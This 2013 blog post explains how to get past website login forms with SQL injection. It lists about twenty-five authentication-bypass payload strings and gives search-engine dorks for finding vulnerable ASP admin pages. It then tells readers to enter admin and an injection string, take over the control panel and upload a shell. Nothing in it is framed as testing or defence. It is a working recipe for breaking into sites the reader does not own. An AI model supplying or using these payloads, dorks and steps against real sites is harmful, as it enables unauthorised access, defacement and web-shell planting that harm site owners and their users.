Thursday, 7 March 2013

SQl injection [string bypass]




sql string bypass is a sqli method used to bypass the login forms in vulnerable sites

here are some SQl strings



1'or'1'='1

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

'or' '='



dorks to find vulnerable sites

Inurl:admin/login.asp?

Inurl:admin.asp?


Inurl:admin/admincp.asp?


just enter these details in the login form 



Username :   admin
Password  :  1'or'1'='1



after you entered all the details you will enter into the cpanel and can edit the site 

you can upload your shell there



hope you liked this post
if you have any doubts you can leave you comments 






No comments:

Post a Comment

Bottom Navi

copyright Encyberpedia. Powered by Blogger.

Followers

like Encyberpedia on Facebook

About

I am Abhilash Naik.Ilove writing blogs on technology and web designing .

About

Tips,Tricks,Hacks,Internet

Total Pageviews